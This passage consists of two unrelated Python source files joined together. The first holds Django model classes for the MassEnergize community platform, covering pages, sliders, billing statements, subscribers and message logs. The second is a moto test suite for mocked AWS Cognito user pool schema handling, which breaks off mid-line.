models.AutoField(primary_key=True) title = models.CharField(max_length=LONG_STR_LEN, db_index=True) graph_type = models.CharField( max_length=TINY_STR_LEN, choices=CHOICES.get("GRAPH_TYPES", {}).items() ) community = models.ForeignKey( Community, on_delete=models.SET_NULL, null=True, blank=True ) data = models.ManyToManyField(Data, blank=True) is_deleted = models.BooleanField(default=False, blank=True) is_published = models.BooleanField(default=False, blank=True) def simple_json(self): return model_to_dict(self, fields=["title", "community", "is_published"]) def full_json(self): res = self.simple_json() res["data"] = [d.simple_json() for d in self.data.all()] return res def __str__(self): return self.title class Meta: verbose_name_plural = "Graphs" ordering = ("title",) class Button(models.Model): """Buttons on the pages""" text = models.CharField(max_length=SHORT_STR_LEN, blank=True) icon = models.CharField(max_length=SHORT_STR_LEN, blank=True) url = models.CharField(max_length=SHORT_STR_LEN, blank=True) color = models.CharField(max_length=SHORT_STR_LEN, blank=True) info = models.JSONField(blank=True, null=True) is_deleted = models.BooleanField(default=False, blank=True) is_published = models.BooleanField(default=True) def __str__(self): return self.text def simple_json(self): return model_to_dict(self) def full_json(self): return self.simple_json() class Meta: ordering = ("text",) class SliderImage(models.Model): """Model the represents the database for Images that will be inserted into slide shows Attributes ---------- title : str title of the page section subtitle: str sub title for this image as should appear on the slider buttons: JSON a json list of buttons with each containing text, link, icon, color etc """ id = models.AutoField(primary_key=True) title = models.CharField(max_length=LONG_STR_LEN, blank=True, db_index=True) subtitle = models.CharField(max_length=LONG_STR_LEN, blank=True) image = models.ForeignKey(Media, on_delete=models.SET_NULL, null=True, blank=True) buttons = models.ManyToManyField(Button, blank=True) is_deleted = models.BooleanField(default=False, blank=True) def __str__(self): return self.title def simple_json(self): return { "id": self.id, "title": self.title, "image": get_json_if_not_none(self.image), } def full_json(self): res = self.simple_json() res["buttons"] = [b.simple_json() for b in self.buttons.all()] return res class Meta: verbose_name_plural = "Slider Images" db_table = "slider_images" class Slider(models.Model): """ Model that represents a model for a slider/carousel on the website Attributes ---------- name : str name of the page section description: str a description of this slider info: JSON dynamic information goes in here """ id = models.AutoField(primary_key=True) name = models.CharField(max_length=LONG_STR_LEN, blank=True, db_index=True) description = models.CharField(max_length=LONG_STR_LEN, blank=True) slides = models.ManyToManyField(SliderImage, blank=True) is_global = models.BooleanField(default=False, blank=True) community = models.ForeignKey( Community, on_delete=models.CASCADE, null=True, blank=True ) is_deleted = models.BooleanField(default=False, blank=True) is_published = models.BooleanField(default=False, blank=True) def __str__(self): return self.name def simple_json(self): return { "id": self.id, "name": self.name, "description": self.description, } def full_json(self): res = self.simple_json() res["slides"] = [s.full_json() for s in self.slides.all()] return res class Menu(models.Model): """Represents items on the menu/navigation bar (top-most bar on the webpage) Attributes ---------- name : str name of the page section content: JSON the content is represented as a json """ id = models.AutoField(primary_key=True) name = models.CharField(max_length=LONG_STR_LEN, unique=True) content = models.JSONField(blank=True, null=True) is_deleted = models.BooleanField(default=False, blank=True) is_published = models.BooleanField(default=False, blank=True) def __str__(self): return self.name def simple_json(self): return model_to_dict(self) def full_json(self): return self.simple_json() class Meta: ordering = ("name",) class Card(models.Model): """Buttons on the pages""" title = models.CharField(max_length=SHORT_STR_LEN, blank=True) description = models.TextField(max_length=LONG_STR_LEN, blank=True) icon = models.CharField(max_length=SHORT_STR_LEN, blank=True) link = models.CharField(max_length=SHORT_STR_LEN, blank=True) media = models.ForeignKey(Media, blank=True, on_delete=models.SET_NULL, null=True) is_deleted = models.BooleanField(default=False, blank=True) is_published = models.BooleanField(default=True) def __str__(self): return self.title def simple_json(self): return { "title": self.title, "description": self.description, "icon": self.icon, "link": self.link, "media": get_json_if_not_none(self.media), } def full_json(self): return self.simple_json() class Meta: ordering = ("title",) class PageSection(models.Model): """ A class used to represent a PageSection #TODO: what about page sections like a gallery, slideshow, etc? Attributes ---------- name : str name of the page section info: JSON dynamic information goes in here """ id = models.AutoField(primary_key=True) name = models.CharField(max_length=SHORT_STR_LEN) title = models.CharField(max_length=SHORT_STR_LEN, blank=True) description = models.TextField(max_length=LONG_STR_LEN, blank=True) image = models.ForeignKey(Media, on_delete=models.SET_NULL, null=True, blank=True) cards = models.ManyToManyField(Card, blank=True) buttons = models.ManyToManyField(Button, blank=True) slider = models.ForeignKey(Slider, on_delete=models.SET_NULL, null=True, blank=True) graphs = models.ManyToManyField(Graph, blank=True, related_name="graphs") info = models.JSONField(blank=True, null=True) is_deleted = models.BooleanField(default=False, blank=True) is_published = models.BooleanField(default=False, blank=True) def __str__(self): return self.name def simple_json(self): return model_to_dict(self, ["id", "name", "title", "description"]) def full_json(self): res = self.simple_json() res["image"] = get_json_if_not_none(self.image) res["cards"] = [c.simple_json() for c in self.cards.all()] res["buttons"] = ([b.simple_json() for b in self.buttons.all()],) res["slider"] = (get_json_if_not_none(self.slider, True),) res["graphs"] = ([g.full_json() for g in self.graphs.all()],) res["info"] = self.info return res class Page(models.Model): """ A class used to represent a Page on a community portal eg. The home page, about-us page, etc Attributes ---------- title : str title of the page description: str the description of the page community: int Foreign key for which community this page is linked to sections: ManyToMany all the different parts/sections that go on this page content: JSON dynamic info for this page goes here. """ id = models.AutoField(primary_key=True) name = models.CharField(max_length=LONG_STR_LEN, db_index=True) description = models.TextField(max_length=LONG_STR_LEN, blank=True) community = models.ForeignKey(Community, on_delete=models.CASCADE, db_index=True) sections = models.ManyToManyField(PageSection, blank=True) info = models.JSONField(blank=True, null=True) is_deleted = models.BooleanField(default=False, blank=True) is_published = models.BooleanField(default=False, blank=True) def __str__(self): return f"{self.name} - {self.community.name}" def simple_json(self): res = model_to_dict(self, ["id", "name", "description"]) res["community"] = get_json_if_not_none(self.community) return res def full_json(self): res = self.simple_json() res["sections"] = [s.full_json() for s in self.sections.all()] res["info"] = self.info return res class Meta: unique_together = [["name", "community"]] class BillingStatement(models.Model): """ A class used to represent a Billing Statement Attributes ---------- name : str name of the statement. amount: decimal the amount of money owed description: the breakdown of the bill for this community community: int Foreign Key to the community to whom this bill is associated. start_date: Datetime the start date from which the charges were incurred end_date: the end date up to which this charge was incurred. more_info: JSON dynamic information goes in here """ id = models.AutoField(primary_key=True) name = models.CharField(max_length=SHORT_STR_LEN) amount = models.CharField(max_length=SHORT_STR_LEN, default="0.0") description = models.TextField(max_length=LONG_STR_LEN, blank=True) start_date = models.DateTimeField(blank=True, db_index=True) end_date = models.DateTimeField(blank=True) more_info = models.JSONField(blank=True, null=True) community = models.ForeignKey( Community, on_delete=models.SET_NULL, null=True, db_index=True ) is_deleted = models.BooleanField(default=False, blank=True) is_published = models.BooleanField(default=False, blank=True) def __str__(self): return self.name def simple_json(self): res = model_to_dict(self, exclude=["community"]) res["community"] = get_json_if_not_none(self.community) return res def full_json(self): return self.simple_json() class Meta: ordering = ("name",) db_table = "billing_statements" class Subscriber(models.Model): """ A class used to represent a subscriber / someone who wants to join the massenergize mailist Attributes ---------- name : str name of the statement. """ id = models.AutoField(primary_key=True) name = models.CharField(max_length=SHORT_STR_LEN) email = models.EmailField(blank=False, db_index=True) community = models.ForeignKey( Community, on_delete=models.SET_NULL, null=True, db_index=True ) created_at = models.DateTimeField(auto_now_add=True) is_deleted = models.BooleanField(default=False, blank=True) def __str__(self): return self.name def simple_json(self): res = model_to_dict(self) res["community"] = None if not self.community else self.community.info() return res def full_json(self): return self.simple_json() class Meta: db_table = "subscribers" unique_together = [["email", "community"]] class EmailCategory(models.Model): """ A class tha represents an email preference that a user or subscriber can subscribe to. Attributes ---------- name : str the name for this email preference community: int Foreign Key to the community this email category is associated with is_global: boolean True if this email category should appear in all the communities """ id = models.AutoField(primary_key=True) name = models.CharField(max_length=SHORT_STR_LEN, db_index=True) community = models.ForeignKey(Community, db_index=True, on_delete=models.CASCADE) is_global = models.BooleanField(default=False, blank=True) is_deleted = models.BooleanField(default=False, blank=True) is_published = models.BooleanField(default=False, blank=True) def __str__(self): return self.name def simple_json(self): return model_to_dict(self) def full_json(self): res = self.simple_json() res["community"] = get_json_if_not_none(self.community) return res class Meta: db_table = "email_categories" unique_together = [["name", "community"]] verbose_name_plural = "Email Categories" class SubscriberEmailPreference(models.Model): """ Represents the email preferences of each subscriber. For a subscriber might want marketing emails but not promotion emails etc Attributes ---------- subscriber: int Foreign Key to a subscriber email_category: int Foreign key to an email category """ id = models.AutoField(primary_key=True) subscriber = models.ForeignKey(Subscriber, on_delete=models.CASCADE, db_index=True) subscribed_to = models.ForeignKey(EmailCategory, on_delete=models.CASCADE) is_deleted = models.BooleanField(default=False, blank=True) def __str__(self): return "%s - %s" % (self.subscriber, self.subscribed_to) def simple_json(self): return { "id": self.id, "subscriber": get_json_if_not_none(self.subscriber), "subscribed_to": get_json_if_not_none(self.subscribed_to), } def full_json(self): return self.simple_json() class Meta: db_table = "subscriber_email_preferences" class PageSettings(models.Model): """ Represents the basic page settings. This is a base class, which contains common attributes to most page settings. Attributes ---------- Community: Foreign key: Which community this applies to title: str Title of the page (if different than default) sub_title: str Sub-title or tag-line of the page (if different than default) description: str Description of the page (if different than default) images: ForeignKeys: Links to one or more Media records featured_video_link: str A link to a featured video (on YouTube or elsewhere) more_info: JSON - extraneous information is_deleted: boolean - whether this page was deleted from the platform (perhaps with it's community) is_published: boolean - whether this page is live is_template: boolean - whether this is a template to be copied """ id = models.AutoField(primary_key=True) community = models.ForeignKey(Community, on_delete=models.CASCADE, db_index=True) title = models.CharField(max_length=LONG_STR_LEN, blank=True) sub_title = models.CharField(max_length=LONG_STR_LEN, blank=True) description = models.TextField(max_length=LONG_STR_LEN, blank=True) images = models.ManyToManyField(Media, blank=True) featured_video_link = models.CharField(max_length=SHORT_STR_LEN, blank=True) more_info = models.JSONField(blank=True, null=True) is_deleted = models.BooleanField(default=False, blank=True) is_published = models.BooleanField(default=True) is_template = models.BooleanField(default=False, blank=True) def simple_json(self): res = model_to_dict(self, exclude=["images"]) res["community"] = get_json_if_not_none(self.community) return res def full_json(self): res = self.simple_json() res["images"] = [i.simple_json() for i in self.images.all()] return res class Meta: abstract = True class HomePageSettings(models.Model): """ Represents the community's Home page settings. Attributes ---------- Community: Foreign key: Which community this applies to title: str Title of the page (if different than default) sub_title: str Sub-title or tag-line of the page (if different than default) description: str Description of the page (if different than default) images: ForeignKeys: Links to one or more Media records featured_video_link: str A link to a featured video (on YouTube or elsewhere) specific to home page: ---------------------- featured_links : JSON - links to page redirects for the big buttons featured_events : links to one or more Event records featured_stats : lins to one or more Data records show_featured_events : boolean - whether to show featured events section show_featured_stats : boolean - whether to show featured stats section show_featured_links : boolean - whether to show featured links section show_featured_video : boolean - whether to show featured video featured_stats_description : str - descriptive text on what the stats are about featured_events_description : str - descriptive text on the featured events specific to the footer on all pages: ------------------------------------ show_footer_subscribe : Boolean - whether to show newsletter subscribe box show_footer_social_media : Boolean - whether to show footer social media icons social_media_links: str Links to social media, such as: ["facebook:www.facebook.com/coolerconcord/,instgram:www.instagram.com/coolerconcord/"] more_info: JSON - extraneous information is_deleted: boolean - whether this page was deleted from the platform (perhaps with it's community) is_published: boolean - whether this page is live is_template: boolean - whether this is a template to be copied """ id = models.AutoField(primary_key=True) community = models.ForeignKey(Community, on_delete=models.CASCADE, db_index=True) title = models.CharField(max_length=LONG_STR_LEN, blank=True) sub_title = models.CharField(max_length=LONG_STR_LEN, blank=True) description = models.TextField(max_length=LONG_STR_LEN, blank=True) images = models.ManyToManyField(Media, related_name="homepage_images", blank=True) featured_video_link = models.CharField(max_length=SHORT_STR_LEN, blank=True) featured_links = models.JSONField(blank=True, null=True) featured_events = models.ManyToManyField(Event, blank=True) featured_stats = models.ManyToManyField(Data, blank=True) show_featured_events = models.BooleanField(default=True, blank=True) show_featured_stats = models.BooleanField(default=True, blank=True) show_featured_links = models.BooleanField(default=True, blank=True) show_featured_video = models.BooleanField(default=False, blank=True) featured_stats_subtitle = models.CharField(max_length=SHORT_STR_LEN, blank=True) featured_stats_description = models.CharField(max_length=LONG_STR_LEN, blank=True) featured_events_subtitle = models.CharField(max_length=SHORT_STR_LEN, blank=True) featured_events_description = models.CharField(max_length=LONG_STR_LEN, blank=True) show_footer_subscribe = models.BooleanField(default=True, blank=True) show_footer_social_media = models.BooleanField(default=True, blank=True) social_media_links = models.JSONField(blank=True, null=True) is_template = models.BooleanField(default=False, blank=True) is_deleted = models.BooleanField(default=False, blank=True) is_published = models.BooleanField(default=True) def __str__(self): return "HomePageSettings - %s" % (self.community) def simple_json(self): res = model_to_dict( self, exclude=["images", "featured_events", "featured_stats"] ) return res def full_json(self): res = self.simple_json() res["images"] = [i.simple_json() for i in self.images.all()] res["community"] = get_json_if_not_none(self.community) res["featured_events"] = [i.simple_json() for i in self.featured_events.all()] res["featured_stats"] = [i.simple_json() for i in self.featured_stats.all()] return res class Meta: db_table = "home_page_settings" verbose_name_plural = "HomePageSettings" class ActionsPageSettings(models.Model): """ Represents the community's Actions page settings. Attributes ---------- see description under PageSettings """ id = models.AutoField(primary_key=True) community = models.ForeignKey(Community, on_delete=models.CASCADE, db_index=True) title = models.CharField(max_length=LONG_STR_LEN, blank=True) sub_title = models.CharField(max_length=LONG_STR_LEN, blank=True) description = models.TextField(max_length=LONG_STR_LEN, blank=True) images = models.ManyToManyField(Media, blank=True) featured_video_link = models.CharField(max_length=SHORT_STR_LEN, blank=True) more_info = models.JSONField(blank=True, null=True) is_deleted = models.BooleanField(default=False, blank=True) is_published = models.BooleanField(default=True) is_template = models.BooleanField(default=False, blank=True) def simple_json(self): res = model_to_dict(self, exclude=["images"]) res["community"] = get_json_if_not_none(self.community) return res def full_json(self): res = self.simple_json() res["images"] = [i.simple_json() for i in self.images.all()] return res def __str__(self): return "ActionsPageSettings - %s" % (self.community) class Meta: db_table = "actions_page_settings" verbose_name_plural = "ActionsPageSettings" class ContactUsPageSettings(models.Model): """ Represents the community's ContactUs page settings. Attributes ---------- see description under PageSettings """ id = models.AutoField(primary_key=True) community = models.ForeignKey(Community, on_delete=models.CASCADE, db_index=True) title = models.CharField(max_length=LONG_STR_LEN, blank=True) sub_title = models.CharField(max_length=LONG_STR_LEN, blank=True) description = models.TextField(max_length=LONG_STR_LEN, blank=True) images = models.ManyToManyField(Media, blank=True) featured_video_link = models.CharField(max_length=SHORT_STR_LEN, blank=True) more_info = models.JSONField(blank=True, null=True) is_deleted = models.BooleanField(default=False, blank=True) is_published = models.BooleanField(default=True) is_template = models.BooleanField(default=False, blank=True) def simple_json(self): res = model_to_dict(self, exclude=["images"]) res["community"] = get_json_if_not_none(self.community) return res def full_json(self): res = self.simple_json() res["images"] = [i.simple_json() for i in self.images.all()] return res def __str__(self): return "ContactUsPageSettings - %s" % (self.community) class Meta: db_table = "contact_us_page_settings" verbose_name_plural = "ContactUsPageSettings" class DonatePageSettings(models.Model): """ Represents the communities Donate page settings. Attributes ---------- see description under PageSettings one additional field: donation_link : str - link to donation url (if not contained within the HTML description) """ id = models.AutoField(primary_key=True) community = models.ForeignKey(Community, on_delete=models.CASCADE, db_index=True) title = models.CharField(max_length=LONG_STR_LEN, blank=True) sub_title = models.CharField(max_length=LONG_STR_LEN, blank=True) description = models.TextField(max_length=LONG_STR_LEN, blank=True) images = models.ManyToManyField(Media, blank=True) featured_video_link = models.CharField(max_length=SHORT_STR_LEN, blank=True) donation_link = models.CharField(max_length=LONG_STR_LEN, blank=True) more_info = models.JSONField(blank=True, null=True) is_deleted = models.BooleanField(default=False, blank=True) is_published = models.BooleanField(default=True) is_template = models.BooleanField(default=False, blank=True) def simple_json(self): res = model_to_dict(self, exclude=["images"]) res["community"] = get_json_if_not_none(self.community) return res def full_json(self): res = self.simple_json() res["images"] = [i.simple_json() for i in self.images.all()] return res def __str__(self): return "DonatePageSettings - %s" % (self.community) class Meta: db_table = "donate_page_settings" verbose_name_plural = "DonatePageSettings" class AboutUsPageSettings(models.Model): """ Represents the community's AboutUs page settings. Attributes ---------- see description under PageSettings """ id = models.AutoField(primary_key=True) community = models.ForeignKey(Community, on_delete=models.CASCADE, db_index=True) title = models.CharField(max_length=LONG_STR_LEN, blank=True) sub_title = models.CharField(max_length=LONG_STR_LEN, blank=True) description = models.TextField(max_length=LONG_STR_LEN, blank=True) images = models.ManyToManyField(Media, blank=True) # image = models.ForeignKey(Media, blank=True, null=True, on_delete=models.SET_NULL) featured_video_link = models.CharField(max_length=SHORT_STR_LEN, blank=True) more_info = models.JSONField(blank=True, null=True) is_deleted = models.BooleanField(default=False, blank=True) is_published = models.BooleanField(default=True) is_template = models.BooleanField(default=False, blank=True) def simple_json(self): res = model_to_dict(self, exclude=["images"]) res["community"] = get_json_if_not_none(self.community) return res def full_json(self): res = self.simple_json() # res['images'] = [i.simple_json() for i in self.images.all()] res["images"] = [i.simple_json() for i in self.images.all()] return res def __str__(self): return "AboutUsPageSettings - %s" % (self.community) class Meta: db_table = "about_us_page_settings" verbose_name_plural = "AboutUsPageSettings" class ImpactPageSettings(models.Model): """ Represents the community's Impact page settings. Attributes ---------- see description under PageSettings """ id = models.AutoField(primary_key=True) community = models.ForeignKey(Community, on_delete=models.CASCADE, db_index=True) title = models.CharField(max_length=LONG_STR_LEN, blank=True) sub_title = models.CharField(max_length=LONG_STR_LEN, blank=True) description = models.TextField(max_length=LONG_STR_LEN, blank=True) images = models.ManyToManyField(Media, blank=True) featured_video_link = models.CharField(max_length=SHORT_STR_LEN, blank=True) more_info = models.JSONField(blank=True, null=True) is_deleted = models.BooleanField(default=False, blank=True) is_published = models.BooleanField(default=True) is_template = models.BooleanField(default=False, blank=True) def simple_json(self): res = model_to_dict(self, exclude=["images"]) res["community"] = get_json_if_not_none(self.community) return res def full_json(self): res = self.simple_json() res["images"] = [i.simple_json() for i in self.images.all()] return res def __str__(self): return "ImpactPageSettings - %s" % (self.community) class Meta: db_table = "impact_page_settings" verbose_name_plural = "ImpactPageSettings" class TeamsPageSettings(PageSettings): """ Represents the community's Teams page settings. Attributes ---------- see description under PageSettings """ def __str__(self): return "TeamsPageSettings - %s" % (self.community) class Meta: db_table = "teams_page_settings" verbose_name_plural = "TeamsPageSettings" class VendorsPageSettings(PageSettings): """ Represents the community's Vendors page settings. Attributes ---------- see description under PageSettings """ def __str__(self): return "VendorsPageSettings - %s" % (self.community) class Meta: db_table = "vendors_page_settings" verbose_name_plural = "VendorsPageSettings" class EventsPageSettings(PageSettings): """ Represents the community's Events page settings. Attributes ---------- see description under PageSettings """ def __str__(self): return "EventsPageSettings - %s" % (self.community) class Meta: db_table = "events_page_settings" verbose_name_plural = "EventsPageSettings" class TestimonialsPageSettings(PageSettings): """ Represents the community's Testimonials page settings. Attributes ---------- see description under PageSettings """ def __str__(self): return "TestimonialsPageSettings - %s" % (self.community) class Meta: db_table = "testimonials_page_settings" verbose_name_plural = "TestimonialsPageSettings" class RegisterPageSettings(PageSettings): """ Represents the community's Registration page settings. Attributes ---------- see description under PageSettings """ def __str__(self): return "RegisterPageSettings - %s" % (self.community) class Meta: db_table = "register_page_settings" verbose_name_plural = "RegisterPageSettings" class SigninPageSettings(PageSettings): """ Represents the community's Signin page settings. Attributes ---------- see description under PageSettings """ def __str__(self): return "SigninPageSettings - %s" % (self.community) class Meta: db_table = "signin_page_settings" verbose_name_plural = "SigninPageSettings" class Message(models.Model): """ A class used to represent a Message sent on the MassEnergize Platform Attributes ---------- """ id = models.AutoField(primary_key=True) user_name = models.CharField(max_length=SHORT_STR_LEN, blank=True, null=True) title = models.CharField(max_length=SHORT_STR_LEN) uploaded_file = models.ForeignKey( Media, blank=True, null=True, on_delete=models.SET_NULL ) email = models.EmailField(blank=True) user = models.ForeignKey( UserProfile, on_delete=models.SET_NULL, null=True, blank=True ) body = models.TextField(max_length=LONG_STR_LEN) community = models.ForeignKey( Community, blank=True, on_delete=models.SET_NULL, null=True ) team = models.ForeignKey(Team, blank=True, on_delete=models.SET_NULL, null=True) have_replied = models.BooleanField(default=False, blank=True) have_forwarded = models.BooleanField(default=False, blank=True) is_team_admin_message = models.BooleanField(default=False, blank=True) is_deleted = models.BooleanField(default=False, blank=True) archive = models.BooleanField(default=False, blank=True) starred = models.BooleanField(default=False, blank=True) response = models.CharField(max_length=LONG_STR_LEN, blank=True, null=True) created_at = models.DateTimeField(auto_now_add=True, null=True) def __str__(self): return f"{self.title}" def simple_json(self): res = model_to_dict(self) res["community"] = get_summary_info(self.community) res["team"] = get_summary_info(self.team) res["user"] = get_summary_info(self.user) res["created_at"] = self.created_at.strftime("%Y-%m-%d %H:%M") return res def full_json(self): res = self.simple_json() res["uploaded_file"] = get_json_if_not_none(self.uploaded_file) return res class Meta: ordering = ("title",) db_table = "messages" class ActivityLog(models.Model): """ A class used to represent Activity Log on the MassEnergize Platform Attributes ---------- """ id = models.AutoField(primary_key=True) path = models.CharField(max_length=SHORT_STR_LEN, default="/") user = models.ForeignKey(UserProfile, on_delete=models.CASCADE, null=True) community = models.ForeignKey(Community, on_delete=models.CASCADE, null=True) created_at = models.DateTimeField(auto_now_add=True) status = models.CharField(max_length=SHORT_STR_LEN, default="success", blank=True) trace = models.JSONField(blank=True, null=True) request_body = models.JSONField(blank=True, null=True) # add response or error field def __str__(self): return self.path def simple_json(self): return model_to_dict(self) def full_json(self): res = self.simple_json() res["user"] = get_json_if_not_none(self.user) res["community"] = get_json_if_not_none(self.community) return res class Meta: ordering = ("path",) db_table = "activity_logs" class Deployment(models.Model): """ A class used to represent Activity Log on the MassEnergize Platform Attributes ---------- """ id = models.AutoField(primary_key=True) version = models.CharField(max_length=SHORT_STR_LEN, default="") deploy_commander = models.CharField( max_length=SHORT_STR_LEN, default="", blank=True ) notes = models.CharField(max_length=LONG_STR_LEN, default="", blank=True) created_at = models.DateTimeField(auto_now_add=True) def __str__(self): return self.version def simple_json(self): return model_to_dict(self) def full_json(self): return self.simple_json() class Meta: db_table = "deployments" ordering = ("-version",)
import base64 import boto3 import json import os import random import re import moto.cognitoidp.models import requests import hmac import hashlib import uuid # noinspection PyUnresolvedReferences import sure # noqa # pylint: disable=unused-import from botocore.exceptions import ClientError, ParamValidationError from jose import jws, jwt from unittest import SkipTest import pytest from moto import mock_cognitoidp, settings from moto.cognitoidp.utils import create_id from moto.core import ACCOUNT_ID @mock_cognitoidp def test_create_user_pool(): conn = boto3.client("cognito-idp", "us-west-2") name = str(uuid.uuid4()) value = str(uuid.uuid4()) result = conn.create_user_pool(PoolName=name, LambdaConfig={"PreSignUp": value}) result["UserPool"]["Id"].should_not.be.none result["UserPool"]["Id"].should.match(r"[\w-]+_[0-9a-zA-Z]+") result["UserPool"]["Arn"].should.equal( "arn:aws:cognito-idp:us-west-2:{}:userpool/{}".format( ACCOUNT_ID, result["UserPool"]["Id"] ) ) result["UserPool"]["Name"].should.equal(name) result["UserPool"]["LambdaConfig"]["PreSignUp"].should.equal(value) @mock_cognitoidp def test_create_user_pool_should_have_all_default_attributes_in_schema(): conn = boto3.client("cognito-idp", "us-west-2") name = str(uuid.uuid4()) result = conn.create_user_pool(PoolName=name) result_schema = result["UserPool"]["SchemaAttributes"] result_schema = {s["Name"]: s for s in result_schema} described_schema = conn.describe_user_pool(UserPoolId=result["UserPool"]["Id"])[ "UserPool" ]["SchemaAttributes"] described_schema = {s["Name"]: s for s in described_schema} for schema in result_schema, described_schema: for ( default_attr_name, default_attr, ) in moto.cognitoidp.models.CognitoIdpUserPoolAttribute.STANDARD_SCHEMA.items(): attribute = schema[default_attr_name] attribute["Required"].should.equal(default_attr["Required"]) attribute["AttributeDataType"].should.equal( default_attr["AttributeDataType"] ) attribute["Mutable"].should.equal(default_attr["Mutable"]) attribute.get("StringAttributeConstraints", None).should.equal( default_attr.get("StringAttributeConstraints", None) ) attribute.get("NumberAttributeConstraints", None).should.equal( default_attr.get("NumberAttributeConstraints", None) ) attribute["DeveloperOnlyAttribute"].should.be.false @mock_cognitoidp def test_create_user_pool_unknown_attribute_data_type(): conn = boto3.client("cognito-idp", "us-west-2") name = str(uuid.uuid4()) attribute_data_type = "Banana" with pytest.raises(ClientError) as ex: conn.create_user_pool( PoolName=name, Schema=[{"Name": "custom", "AttributeDataType": attribute_data_type,},], ) ex.value.response["Error"]["Code"].should.equal("InvalidParameterException") ex.value.response["Error"]["Message"].should.equal( f"Validation error detected: Value '{attribute_data_type}' failed to satisfy constraint: Member must satisfy enum value set: [Boolean, Number, String, DateTime]" ) ex.value.response["ResponseMetadata"]["HTTPStatusCode"].should.equal(400) @mock_cognitoidp def test_create_user_pool_custom_attribute_without_data_type(): conn = boto3.client("cognito-idp", "us-west-2") with pytest.raises(ClientError) as ex: conn.create_user_pool(PoolName=str(uuid.uuid4()), Schema=[{"Name": "custom",},]) ex.value.response["Error"]["Code"].should.equal("InvalidParameterException") ex.value.response["Error"]["Message"].should.equal( "Invalid AttributeDataType input, consider using the provided AttributeDataType enum." ) ex.value.response["ResponseMetadata"]["HTTPStatusCode"].should.equal(400) @mock_cognitoidp def test_create_user_pool_custom_attribute_defaults(): conn = boto3.client("cognito-idp", "us-west-2") res = conn.create_user_pool( PoolName=str(uuid.uuid4()), Schema=[ {"Name": "string", "AttributeDataType": "String",}, {"Name": "number", "AttributeDataType": "Number",}, ], ) string_attribute = next( attr for attr in res["UserPool"]["SchemaAttributes"] if attr["Name"] == "custom:string" ) string_attribute["DeveloperOnlyAttribute"].should.be.false string_attribute["Mutable"].should.be.true string_attribute.get("StringAttributeConstraints").should.be.none number_attribute = next( attr for attr in res["UserPool"]["SchemaAttributes"] if attr["Name"] == "custom:number" ) number_attribute["DeveloperOnlyAttribute"].should.be.false number_attribute["Mutable"].should.be.true number_attribute.get("NumberAttributeConstraints").should.be.none @mock_cognitoidp def test_create_user_pool_custom_attribute_developer_only(): conn = boto3.client("cognito-idp", "us-west-2") res = conn.create_user_pool( PoolName=str(uuid.uuid4()), Schema=[ { "Name": "banana", "AttributeDataType": "String", "DeveloperOnlyAttribute": True, }, ], ) # Note that this time we are looking for 'dev:xyz' attribute attribute = next( attr for attr in res["UserPool"]["SchemaAttributes"] if attr["Name"] == "dev:custom:banana" ) attribute["DeveloperOnlyAttribute"].should.be.true @mock_cognitoidp def test_create_user_pool_custom_attribute_required(): conn = boto3.client("cognito-idp", "us-west-2") with pytest.raises(ClientError) as ex: conn.create_user_pool( PoolName=str(uuid.uuid4()), Schema=[ {"Name": "banana", "AttributeDataType": "String", "Required": True}, ], ) ex.value.response["Error"]["Code"].should.equal("InvalidParameterException") ex.value.response["Error"]["Message"].should.equal( "Required custom attributes are not supported currently." ) ex.value.response["ResponseMetadata"]["HTTPStatusCode"].should.equal(400) @mock_cognitoidp @pytest.mark.parametrize( "attribute", [ {"Name": "email", "AttributeDataType": "Number"}, {"Name": "email", "DeveloperOnlyAttribute": True}, ], ids=["standard_attribute", "developer_only"], ) def test_create_user_pool_standard_attribute_with_changed_data_type_or_developer_only( attribute, ): conn = boto3.client("cognito-idp", "us-west-2") with pytest.raises(ClientError) as ex: conn.create_user_pool(PoolName=str(uuid.uuid4()), Schema=[attribute]) ex.value.response["Error"]["Code"].should.equal("InvalidParameterException") ex.value.response["Error"]["Message"].should.equal( f"You can not change AttributeDataType or set developerOnlyAttribute for standard schema attribute {attribute["Name"]}" ) ex.value.response["ResponseMetadata"]["HTTPStatusCode"].should.equal(400) @mock_cognitoidp def test_create_user_pool_attribute_with_schema(): conn = boto3.client("cognito-idp", "us-west-2") res = conn.create_user_pool( PoolName=str(uuid.uuid4()), Schema=[ { "Name": "string", "AttributeDataType": "String", "NumberAttributeConstraints": {"MinValue": "10", "MaxValue": "20"}, "StringAttributeConstraints": {"MinLength": "10", "MaxLength": "20"}, }, { "Name": "number", "AttributeDataType": "Number", "NumberAttributeConstraints": {"MinValue": "10", "MaxValue": "20"}, "StringAttributeConstraints": {"MinLength": "10", "MaxLength": "20"}, }, { "Name": "boolean", "AttributeDataType": "Boolean", "NumberAttributeConstraints": {"MinValue": "10", "MaxValue": "20"}, "StringAttributeConstraints": {"MinLength": "10", "MaxLength": "20"}, }, ], ) string_attribute = next( attr for attr in res["UserPool"]["SchemaAttributes"] if attr["Name"] == "custom:string" ) string_attribute["StringAttributeConstraints"].should.equal( {"MinLength": "10", "MaxLength": "20"} ) string_attribute.get("NumberAttributeConstraints").should.be.none number_attribute = next( attr for attr in res["UserPool"]["SchemaAttributes"] if attr["Name"] == "custom:number" ) number_attribute["NumberAttributeConstraints"].should.equal( {"MinValue": "10", "MaxValue": "20"} ) number_attribute.get("StringAttributeConstraints").should.be.none boolean_attribute = next( attr for attr in res["UserPool"]["SchemaAttributes"] if attr["Name"] == "custom:boolean" ) boolean_attribute.get("NumberAttributeConstraints").should.be.none boolean_attribute.get("StringAttributeConstraints").should.be.none @mock_cognitoidp def test_create_user_pool_attribute_partial_schema(): conn = boto3.client("cognito-idp", "us-west-2") res = conn.create_user_pool( PoolName=str(uuid.uuid4()), Schema=[ { "Name": "string_no_min", "AttributeDataType": "String", "StringAttributeConstraints": {"MaxLength": "10"}, }, { "Name": "string_no_max", "AttributeDataType": "String", "StringAttributeConstraints": {"MinLength": "10"}, }, { "Name": "number_no_min", "AttributeDataType": "Number", "NumberAttributeConstraints": {"MaxValue": "10"}, }, { "Name": "number_no_max", "AttributeDataType": "Number", "NumberAttributeConstraints": {"MinValue": "10"}, }, ], ) string_no_min = next( attr for attr in res["UserPool"]["SchemaAttributes"] if attr["Name"] == "custom:string_no_min" ) string_no_max = next( attr for attr in res["UserPool"]["SchemaAttributes"] if attr["Name"] == "custom:string_no_max" ) number_no_min = next( attr for attr in res["UserPool"]["SchemaAttributes"] if attr["Name"] == "custom:number_no_min" ) number_no_max = next( attr for attr in res["UserPool"]["SchemaAttributes"] if attr["Name"] == "custom:number_no_max" ) string_no_min["StringAttributeConstraints"]["MaxLength"].should.equal("10") string_no_min["StringAttributeConstraints"].get("MinLength", 